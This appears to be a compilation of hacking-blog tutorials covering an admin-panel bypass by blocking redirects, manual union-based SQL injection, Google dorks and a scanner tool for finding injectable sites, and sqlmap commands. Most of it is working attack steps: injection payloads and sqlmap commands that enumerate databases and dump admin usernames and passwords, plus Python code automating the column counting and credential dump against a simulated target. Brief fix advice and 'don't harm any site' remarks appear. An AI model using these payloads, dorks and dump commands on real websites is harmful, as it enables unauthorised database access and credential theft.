http://vuln-web.com/admin/dashboard.php    (Error, Page Not Found)
http://vuln-web.com/admin/default.php      (Error, Page Not Found)
http://vuln-web.com/admin/admin.php        (Redirected to index page )
  • http://vuln-web.com/admin/admin.php redirects to the index (login) page, which means the file exists; this is the page we will request directly.
  • To request it directly I block the redirect with NoRedirect: open the add-on from the menu bar (press the Alt key to show it).
  • Add the admin panel URL to the add-on,
 example: http://vuln-web.com/admin/
  • Now request admin.php again. This time no redirection takes place because we blocked it, and if the script only sends a Location header without stopping (the classic header() without exit() in PHP), the browser renders the protected page that the server sent along with the 302.

Done. The only thing you need to do is guess the files in the admin folder; if you cannot find any, spider or crawl the site and request the pages you find. The underlying bug is that the server emits the protected content after the redirect header instead of terminating, so the fix on the server side is to exit immediately after sending the Location header and to check the session before producing any output.
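The no-redirect trick works only because of that server-side mistake, and you can confirm it without a browser add-on. The following Python script is an added example, not part of the original post: AdminPage is a constructed stand-in for admin.php which, when fixed is False, sends the 302 to index.php but keeps writing the protected page into the response body (the PHP header() without exit() pattern); fetch_without_redirect reads the raw 302 the way NoRedirect lets the browser render it, and is_leaky_redirect flags a redirect that carries real markup. The paths, HTML and cookie name are assumptions.

```python
import threading
import http.client
from http.server import BaseHTTPRequestHandler, HTTPServer

LOGIN_PATH = "/admin/index.php"
ADMIN_HTML = (b"<html><body><h1>Admin dashboard</h1>"
              b"<a href='users.php'>Users</a><a href='upload.php'>Upload</a></body></html>")


class AdminPage(BaseHTTPRequestHandler):
    """Constructed stand-in for admin.php. With fixed=False it mimics PHP code that calls
    header('Location: index.php') and then keeps running, so the protected page is still
    sent in the body of the 302. With fixed=True it stops right after the redirect."""
    fixed = False

    def do_GET(self):
        if self.path == LOGIN_PATH:
            body = b"<form method='post'>login</form>"
            self.send_response(200)
        elif "session=" not in self.headers.get("Cookie", ""):
            self.send_response(302)
            self.send_header("Location", LOGIN_PATH)
            body = b"" if self.fixed else ADMIN_HTML   # bug: page emitted after the redirect header
        else:
            self.send_response(200)
            body = ADMIN_HTML
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):
        pass


def fetch_without_redirect(host: str, port: int, path: str):
    """http.client never follows redirects, so this is exactly what the browser would
    render with NoRedirect active: status, Location header and the raw body."""
    conn = http.client.HTTPConnection(host, port, timeout=5)
    try:
        conn.request("GET", path)
        resp = conn.getresponse()
        return resp.status, resp.getheader("Location"), resp.read()
    finally:
        conn.close()


def is_leaky_redirect(status: int, body: bytes, min_bytes: int = 64) -> bool:
    """A 3xx whose body carries real markup is the bug this bypass relies on."""
    return 300 <= status < 400 and len(body) >= min_bytes and b"<" in body


def probe(path: str, fixed: bool):
    """Run the stand-in server on a free loopback port and test one page."""
    AdminPage.fixed = fixed
    server = HTTPServer(("127.0.0.1", 0), AdminPage)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        status, location, body = fetch_without_redirect("127.0.0.1", server.server_port, path)
    finally:
        server.shutdown()
        server.server_close()
    return status, location, is_leaky_redirect(status, body)


if __name__ == "__main__":
    for fixed in (False, True):
        print("fixed" if fixed else "vulnerable", probe("/admin/admin.php", fixed))
```

Against a real target, point fetch_without_redirect at the guessed admin page: a 302 with a Content-Length of a few hundred bytes and a form or navigation links in the body is the finding, and a 302 with an empty body means the redirect is done properly and the add-on will not help.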

Thanks for reading guys, keep sharing and practising.

SQL injection Union Based Manually Step by Step


Hello guys, hope you are doing well. In this tutorial we will discuss basic union-based SQL injection done manually. First I would recommend that you learn the basics of SQL from w3schools. Let me start with an introduction.

What is SQL Injection ?

SQL injection is a type of code injection vulnerability in the database layer of an application. A successful SQL injection exploit can read and modify the backend database. The vulnerability exists when user input is concatenated into a query without proper filtering or parameterisation.

What an attacker can do ?

  • An attacker can inject into the website and read and modify the database.
  • An attacker can take control of your admin panel, if you have one.
  • If the targeted website is an e-commerce site that stores customer information, the attacker can easily get it.
  • An attacker can upload a shell and deface the website.

So lets start our work….

Step 1:

Find an SQL-injection-vulnerable website with Google dorks, for example:

inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:shop.php?id=

Step 2:

Now check the vulnerability by adding a single quote after the id parameter and hitting Enter. If you get an error message such as an SQL syntax error, the site is vulnerable to SQL injection.

www.vulnerablesite.com/index.php?id=1'

Step 3:

If the site is vulnerable, the next step is to find the number of columns with the ORDER BY statement.

www.vulnerablesite.com/index.php?id=1' order by 1 --+ [no error]
www.vulnerablesite.com/index.php?id=1' order by 2 --+ [no error]
www.vulnerablesite.com/index.php?id=1' order by 3 --+ [no error]
www.vulnerablesite.com/index.php?id=1' order by 4 --+ [no error]
www.vulnerablesite.com/index.php?id=1' order by 5 --+ [error]

Here I got the error message at order by 5, which means the total number of columns is 4.

Step:4

Now we find the vulnerable (reflected) column with the UNION command:

www.vulnerablesite.com/index.php?id=1' union select 1,2,3,4 --+

[screenshot: the page showing the number of the column that is displayed]

As you can see in the screenshot, the vulnerable column is 2. In that column we can use the following expressions:

Version - @@version also version()
Database- database()
Current User - user()

Step 5 :

Now we find the table names; paste this expression into the vulnerable column:

(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE())

Step 6:

We find the column names of a particular table with this query:

www.vulnerablesite.com/index.php?id=1' union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name=[table name in hex]--+

Now we have the column names of the table; our next target is to dump the data.

Step 7:

Now we have the database, table and column names, so we dump the data of the targeted website. Replace column_name with the target columns, e.g. username and password, and add the targeted table (admin here) after FROM:

www.vulnerablesite.com/index.php?id=1' union select 1,group_concat(username,0x3a,password),3,4 from admin--+

And we have the usernames and passwords.
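As an added example covering the procedure above (and the same union steps in the MSSQL post earlier on this page), here is a self-contained Python simulation that is not code from the original post: VulnerableApp is a constructed stand-in for index.php that concatenates id into its query over an in-memory SQLite database, and the attacker-side functions perform steps 3 to 7 against it: ORDER BY to count the columns, unique markers instead of 1,2,3,4 to see which columns are reflected, then group_concat through the reflected column. SQLite is not MySQL, so the schema queries use sqlite_master and pragma_table_info() in place of information_schema and || in place of concat(); the tables and their contents are made up.

```python
import re
import secrets
import sqlite3
from typing import List, Optional


def make_target_db() -> sqlite3.Connection:
    """Constructed sample backend; SQLite stands in for MySQL."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE articles(id INTEGER, title TEXT, body TEXT, author TEXT);
        INSERT INTO articles VALUES (1, 'Hello world', 'First post', 'alice');
        CREATE TABLE admin(id INTEGER, username TEXT, password TEXT);
        INSERT INTO admin VALUES (1, 'admin', 's3cret');
    """)
    return db


class VulnerableApp:
    """index.php?id=... built by string concatenation: the bug every step below exploits."""

    def __init__(self) -> None:
        self.db = make_target_db()

    def page(self, id_param: str) -> str:
        sql = "SELECT id, title, body, author FROM articles WHERE id=" + id_param  # no parameter binding
        try:
            rows = self.db.execute(sql).fetchall()
        except sqlite3.Error as exc:
            return f"SQL error: {exc}"
        # only title (column 2) and author (column 4) are rendered, so only those can reflect data
        return "".join(f"<h1>{r[1]}</h1><p>by {r[3]}</p>" for r in rows)


def find_column_count(app: VulnerableApp, max_cols: int = 20) -> Optional[int]:
    """Step 3: ORDER BY n errors as soon as n exceeds the number of columns."""
    for n in range(1, max_cols + 1):
        if app.page(f"1 order by {n}--").lower().startswith("sql error"):
            return n - 1
    return None


def find_reflected_columns(app: VulnerableApp, ncols: int) -> List[int]:
    """Step 4: put a unique marker in every column and see which ones appear in the page."""
    markers = [f"m{secrets.token_hex(4)}" for _ in range(ncols)]
    cols = ",".join(f"'{m}'" for m in markers)
    body = app.page(f"1 and 1=2 union select {cols}--")
    return [i + 1 for i, m in enumerate(markers) if m in body]


def read_through(app: VulnerableApp, ncols: int, col: int, expr: str) -> str:
    """Steps 5-7: place `expr` in the reflected column, NULL elsewhere, and pull it out of the page."""
    cols = ["null"] * ncols
    cols[col - 1] = expr
    body = app.page(f"1 and 1=2 union select {','.join(cols)}--")
    m = re.search(r"<h1>(.*?)</h1>", body)
    return m.group(1) if m else body


def dump(app: VulnerableApp) -> dict:
    ncols = find_column_count(app)
    col = find_reflected_columns(app, ncols)[0]
    # SQLite equivalents of the tutorial's MySQL expressions:
    #   information_schema.tables  -> sqlite_master,  information_schema.columns -> pragma_table_info()
    #   concat(a,0x3a,b)           -> a||':'||b
    tables = read_through(app, ncols, col,
                          "(select group_concat(name) from sqlite_master where type='table')")
    columns = read_through(app, ncols, col,
                           "(select group_concat(name) from pragma_table_info('admin'))")
    creds = read_through(app, ncols, col,
                         "(select group_concat(username||':'||password) from admin)")
    return {"columns": ncols, "reflected": col, "tables": tables,
            "admin_columns": columns, "admin_rows": creds}


if __name__ == "__main__":
    print(dump(VulnerableApp()))
```

Random markers are used instead of the numbers 1,2,3,4 because a page that happens to print "2" somewhere in its own content would make you pick the wrong column; sqlmap does the same thing with random strings.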

keep practising but don’t harm any site…

 

How to find sql vulnerable website easily


Hello guys, in this post I will show you how to find a lot of SQL-injectable websites with a single dork using an automated tool, although I recommend finding them manually. Many newbies cannot easily find a vulnerable site to inject, so with this tutorial they should be able to.

In this tutorial we use SQL DB; if you do not have it, you can find it through Google.

  • Launch SQL DB; on the left you will see the search option.


  • Enter your dork. The best feature of this tool is that you can choose which search engine to use; it also offers a deep scan and a proxy option.
  • When you start the search with your dork, the scan begins.
  • While it scans you will see several tabs, such as Proxy, Vulnerable, etc.
  • Click Vulnerable and it shows you the list of SQL-injectable websites.

SQL injection through SQLMAP step by step


Hello guys, today I am going to show you a major vulnerability in web applications. There are many types of injection, and SQL injection is one of them. SQL injection is a vast subject, so keep learning; I am still a learner too. Without wasting any time, let's come to the point.

SQL Injection

SQL injection is a vulnerability in which an attacker can execute SQL of their own choosing and expose the backend database; in simple words, an attacker can dump your database.

SQL Map

sqlmap is an open-source command-line tool for detecting and exploiting SQL injection vulnerabilities.

If you are using Windows you can download sqlmap from the project's website; Kali Linux has it preinstalled.

Let's start the practical.

  • Launch sqlmap.

Now type the following command in the terminal:

  • python sqlmap.py -u http://yourtargetaddress.com/?id=1 --current-db


  • sqlmap starts and takes a few seconds to detect the injection and enumerate the current database.
  • Now that we have the database name, the next step is to enumerate its tables.
  • Type the following command to enumerate the tables (follow me step by step 🙂):

python sqlmap.py -u http://yourtargetaddress.com/?id=1 -D <database> --tables

The table names are enumerated. Next we have to find the columns; here I am finding the columns of the admin table:

python sqlmap.py -u http://yourtargetaddress.com/?id=1 -D <database> -T admin --columns

Again sqlmap enumerates the column names, this time from the table admin.


Cool, we have the column names; the next step is to dump the username and password.

Follow me and use this command:

python sqlmap.py -u http://yourtargetaddress.com/?id=1 -D <database> -T admin -C username,password --dump

sqlmap dumps the selected columns, and we have the username and password. 🙂 Keep learning and practising, but don't harm any site.